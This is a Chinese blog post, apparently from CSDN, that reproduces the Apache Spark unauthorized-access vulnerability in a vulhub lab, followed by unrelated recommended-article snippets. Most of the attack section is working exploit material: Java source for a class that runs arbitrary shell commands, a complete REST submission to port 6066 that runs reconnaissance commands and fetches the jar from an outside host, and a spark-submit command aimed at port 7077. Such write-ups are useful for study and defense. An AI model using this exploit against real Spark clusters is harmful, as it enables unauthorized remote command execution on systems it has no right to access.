vulhub漏洞复现-Apache Spark 未授权访问漏洞

SparkApache Spark 是专为大规模数据处理而设计的快速通用的计算引擎，一个完整的的动力核心，负责计算中数据的来源，数据的操作，数据的管理并将合适的计算结果根据要求给予返回。处理数据处理的目的不同会有很多不同的类别。思路未授权的用户可以向管理节点提交一个应用，这个应用实际上是恶意代码。提交方法有两种利用 REST API利用 submissions 网关（集成在 7077 端口中）参

Ys3ter

4428人浏览 · 2021-10-28 09:43:32

Ys3ter · 2021-10-28 09:43:32 发布

Spark

Apache Spark 是专为大规模数据处理而设计的快速通用的计算引擎，一个完整的的动力核心，负责计算中数据的来源，数据的操作，数据的管理并将合适的计算结果根据要求给予返回。处理数据处理的目的不同会有很多不同的类别。

思路

未授权的用户可以向管理节点提交一个应用，这个应用实际上是恶意代码。提交方法有两种

利用 REST API
利用 submissions 网关（集成在 7077 端口中）

参考 Apache Spark 未授权访问漏洞

漏洞复现

docker部署环境时将以 standalone 模式启动一个 Apache Spark 集群，集群里有一个 master 与一个 slave，访问 http://your-ip:8080 即可看到 master 的管理页面，访问 http://your-ip:8081 即可看到 slave 的管理页面。

提交的应用可以是java可以是python，将其编译成 JAR，放在任意一个 HTTP 或 FTP 上，如 http://vulhub.yster.live/1.jar

import java.io.BufferedReader;
import java.io.InputStreamReader;

public class Exploit {
  public static void main(String[] args) throws Exception {
    String[] cmds = args[0].split(",");

    for (String cmd : cmds) {
      System.out.println(cmd);
      System.out.println(executeCommand(cmd.trim()));
      System.out.println("==============================================");
    }
  }

  // https://www.mkyong.com/java/how-to-execute-shell-command-from-java/
  private static String executeCommand(String command) {
    StringBuilder output = new StringBuilder();

    try {
      Process p = Runtime.getRuntime().exec(command);
      p.waitFor();
      BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));

      String line;
      while ((line = reader.readLine()) != null) {
        output.append(line).append("\n");
      }
    } catch (Exception e) {
      e.printStackTrace();
    }

    return output.toString();
  }
}

在这里插入图片描述

REST API

standalone 模式(Spark集群的三种运行模式之一)下，master 将在 6066 端口启动一个 HTTP 服务器，我们向这个端口提交 REST 格式的 API：
访问并抓包
在这里插入图片描述

POST /v1/submissions/create HTTP/1.1

{
  "action": "CreateSubmissionRequest",
  "clientSparkVersion": "2.3.1",
  "appArgs": [
    "whoami,w,cat /proc/version,ifconfig,route,df -h,free -m,netstat -nltp,ps auxf"
  ],
  "appResource": "http://vulhub.yster.live/1.jar",
  "environmentVariables": {
    "SPARK_ENV_LOADED": "1"
  },
  "mainClass": "Exploit",
  "sparkProperties": {
    "spark.jars": "http://vulhub.yster.live/1.jar",
    "spark.driver.supervise": "false",
    "spark.app.name": "Exploit",
    "spark.eventLog.enabled": "true",
    "spark.submit.deployMode": "cluster",
    "spark.master": "spark://your-ip:6066"
  }
}

1.jar是放上去的应用，mainClass是待运行的类，appArgs是传给应用的参数
在这里插入图片描述
成功返回，访问http://your-ip:8081/logPage/?driverId={submissionId}&logType=stdout查看执行结果

利用 submissions 网关

如果 6066 端口不能访问，或做了权限控制，我们可以利用 master 的主端口 7077，来提交应用。

方法是利用 Apache Spark 自带的脚本 bin/spark-submit：

bin/spark-submit --master spark://your-ip:7077 --deploy-mode cluster --class Exploit http://vulhub.yster.live/1.jar id

如果你指定的 master 参数是 rest 服务器，这个脚本会先尝试使用 rest api 来提交应用；如果发现不是 rest 服务器，则会降级到使用 submission gateway 来提交应用。

查看结果的方式与前面一致。

CSDN学习社区

CSDN联合极客时间，共同打造面向开发者的精品内容学习社区，助力成长！

更多推荐

嵌入式作业（七）：基于Ardunio的STM32串口通信

嵌入式作业（七）0作业要求1Ardunio 完成STM32的串口通信（1）安装Ardunio IDE（2）stm32串口通信2关于 stduino IDE0作业要求安装 Ardunio IDE 和相关软件支持库，在Ardunio 完成STM32板子的串口通信程序：（1）持续向串口输出“Hello world！”；（2）当接收到“stop!”时，停止输出。网上有一个国人版的MCU集成开发平台， st

CSDN学习社区

JDBC详解

JDBC文章目录JDBC什么是JDBC?JDBC驱动程序:Java使用JDBC访问数据库的步骤:设置classpath:Oracle连接字符串的书写格式:简单的例子:常用数据库的驱动程序及JDBC URL:Oracle数据库:SQL Server数据库MySQL数据库Access数据库PreparedStatement接口:JNDI-数据源（Data Source）与连接池（Connection

CSDN学习社区

“模式识别与机器学习”学习笔记no2.再谈感知机

接**上篇：上篇主要进行了PLA，Pocket算法的理论过程分析和在给定数据集上利用pocket算法对数据集进行分类学习，得到错分数量最少的分类面。上篇中pocket算法的过程已经进行了编程和测试，框架已经建立了起来，这一篇主要上篇中没有提到或涉及不深的几个问题。1.数据集的构造。上篇是直接使用了题目给的向量，这次来根据正态分布来产生数据集。np.random.normal函数可以根据均值和方差生